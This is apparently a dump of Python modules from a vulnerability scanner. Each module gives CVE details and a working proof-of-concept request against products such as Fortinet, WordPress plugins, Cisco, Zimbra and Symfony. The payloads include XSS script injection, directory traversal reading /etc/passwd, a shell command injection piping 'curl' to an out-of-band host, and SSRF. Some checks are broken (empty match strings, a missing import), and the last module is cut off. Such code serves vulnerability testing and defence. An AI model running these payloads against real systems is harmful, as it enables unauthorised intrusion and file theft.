def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-1880.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''XSS in Fortigates SSL VPN login page''', 9 | "description": '''Cross-site scripting (XSS) vulnerability in the sslvpn login page in Fortinet FortiOS 5.2.x before 5.2.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2015-1880", 13 | "https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "xss", "fortigates", "ssl"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = "/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en" 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-5111.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Fonality trixbox - Directory Traversal''', 9 | "description": '''Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/39351", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2014-5111" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2014-5111", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2014", "lfi", "trixbox"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/huawei-router-auth-bypass.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Huawei Router Authentication Bypass''', 9 | "description": '''The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device.''', 10 | "severity": "critical", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/48310" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["huawei", "auth-bypass", "router"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/api/system/deviceinfo""" 39 | method = "GET" 40 | data = """""" 41 | headers = {'Accept': 'application/json, text/javascript, */*; q=0.01'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if (resp0.status_code == 200) and ("""DeviceName""" in resp0.text and """SerialNumber""" in resp0.text and """HardwareVersion""" in resp0.text): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/jfrog-unauth-build-exposed.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''JFrog Unauthentication Builds''', 9 | "description": '''''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["jfrog"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/ui/api/v1/global-search/builds?jfLoader=true""" 39 | method = "POST" 40 | data = {"name":"","before":"","after":"","direction":"desc","order_by":"date","num_of_rows":100} 41 | headers = {'Content-Type': 'application/json'} 42 | resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if ("""last_build_number""" in resp0.text and """build_name""" in resp0.text) and ("""application/json""" in str(resp0.headers)) and (resp0.status_code == 200): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/sponip-network-system-ping-rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from plugins.oob import verify_request, gen_oob_domain 3 | 4 | 5 | 6 | # Vuln Base Info 7 | def info(): 8 | return { 9 | "author": "cckuailong", 10 | "name": '''Sponip Network System Ping RCE''', 11 | "description": '''''', 12 | "severity": "critical", 13 | "references": [ 14 | "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c735e3e9" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["sponip", "rce", "oast", "network"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | 40 | oob_domain,flag = gen_oob_domain() 41 | 42 | path = """/php/ping.php""" 43 | method = "POST" 44 | data = """sondata[ip]=a|curl {oob_domain}&jsondata[type]=1""".format(oob_domain=oob_domain) 45 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 46 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 47 | 48 | if verify_request(type="dns", flag=flag): 49 | result["success"] = True 50 | result["info"] = info() 51 | result["payload"] = url+path 52 | 53 | except: 54 | result["success"] = False 55 | 56 | return result 57 | 58 | 59 | # Exploit, can be same with poc() 60 | def exp(url): 61 | return poc(url) 62 | 63 | 64 | # Utils 65 | def format_url(url): 66 | url = url.strip() 67 | if not ( url.startswith('http://') or url.startswith('https://') ): 68 | url = 'http://' + url 69 | url = url.rstrip('/') 70 | 71 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-9094.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''WordPress DZS-VideoGallery Plugin Reflected Cross-Site Scripting''', 9 | "description": '''Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2014-9094" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "CVE-2014-9094", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2014", "wordpress", "xss", "wp-plugin"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-4414.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal''', 9 | "description": '''Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/37274", 13 | "https://www.cvedetails.com/cve/CVE-2015-4414" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "wordpress", "wp-plugin", "lfi"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/thruk-xss.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Thruk Monitoring Webinterface - XSS''', 9 | "description": '''''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://www.thruk.org/download.html" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["xss", "thruk"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/thruk/cgi-bin/login.cgi""" 39 | method = "POST" 40 | data = """referer=%2Fthruk&login=--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=Thruk+Monitoring+Webinterface""" 41 | headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': '{{Hostname}}/thruk/cgi-bin/login.cgi?thruk'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if (resp0.status_code == 200) and ("""""" in resp0.text) and ("""text/html""" in str(resp0.headers)): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/cves/2013/CVE-2013-2287.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting''', 9 | "description": '''Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2013-2287" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "CVE-2013-2287", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2013", "wordpress", "xss", "wp-plugin"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and "text/html" in str(resp.headers) and "" in resp.text: 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url -------------------------------------------------------------------------------- /modules/cves/2019/CVE-2019-17538.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Jnoj arbitrary local file inclusion (LFI)''', 9 | "description": '''Jiangnan Online Judge (aka jnoj) 0.8.0 has directory traversal (LFI) vulnerability via web/polygon/problem/viewfile?id=1&name=../''', 10 | "severity": "high", 11 | "references": [ 12 | "https://github.com/shi-yang/jnoj/issues/53" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 16 | "cvss-score": "", 17 | "cve-id": "CVE-2019-17538", 18 | "cwe-id": "CWE-22" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2019", "jnoj", "lfi"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd""" 39 | method = "GET" 40 | data = """""" 41 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if (resp0.status_code == 200) and (re.search(r"""root:.*:0:0:""",resp0.text)): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/cves/2013/CVE-2013-5528.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Cisco Unified Communications Manager 7/8/9 - Directory Traversal''', 9 | "description": '''A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/40887", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2014-3120" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2013-5528", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2013", "lfi", "cisco"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-9444.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting''', 9 | "description": '''The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2014-9444" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2014-9444", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2014", "wordpress", "wp-plugin", "xss"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-6544.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''iTop XSS''', 9 | "description": '''Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2015-6544" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 16 | "cvss-score": "6.1", 17 | "cve-id": "CVE-2015-6544", 18 | "cwe-id": "CWE-79" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2015", "xss", "itop"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-8399.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Atlassian Confluence configuration files read''', 9 | "description": '''Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", 16 | "cvss-score": "4.3", 17 | "cve-id": "CVE-2015-8399", 18 | "cwe-id": "CWE-200" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | "shodan-query":'''http.component:"Atlassian Confluence"''' 23 | }, 24 | "tags": ["cve", "cve2015", "atlassian", "confluence"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/spaces/viewdefaultdecorator.action?decoratorName' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and "confluence-init.properties" in resp.text and "View Default Decorator" in resp.text: 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-4050.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''ESI unauthorized access''', 9 | "description": '''FragmentListener in the HttpKernel component in Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2015-4050" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "symfony", "rce"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/_fragment?_path=_controller=phpcredits&flag=-1' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "PHP Credits" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2020/CVE-2020-7796.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from plugins.oob import verify_request, gen_oob_domain 3 | 4 | 5 | 6 | # Vuln Base Info 7 | def info(): 8 | return { 9 | "author": "cckuailong", 10 | "name": '''Zimbra Collaboration Suite (ZCS) - SSRF''', 11 | "description": '''Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.''', 12 | "severity": "critical", 13 | "references": [ 14 | "https://www.adminxe.com/2183.html" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 18 | "cvss-score": "", 19 | "cve-id": "CVE-2020-7796", 20 | "cwe-id": "CWE-918" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2020", "zimbra", "ssrf", "oast"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | 40 | oob_domain,flag = gen_oob_domain() 41 | 42 | path = """/zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://oob_domain%23""" 43 | method = "GET" 44 | data = """""" 45 | headers = {} 46 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 47 | 48 | if verify_request(type="dns", flag=flag): 49 | result["success"] = True 50 | result["info"] = info() 51 | result["payload"] = url+path 52 | 53 | except: 54 | result["success"] = False 55 | 56 | return result 57 | 58 | 59 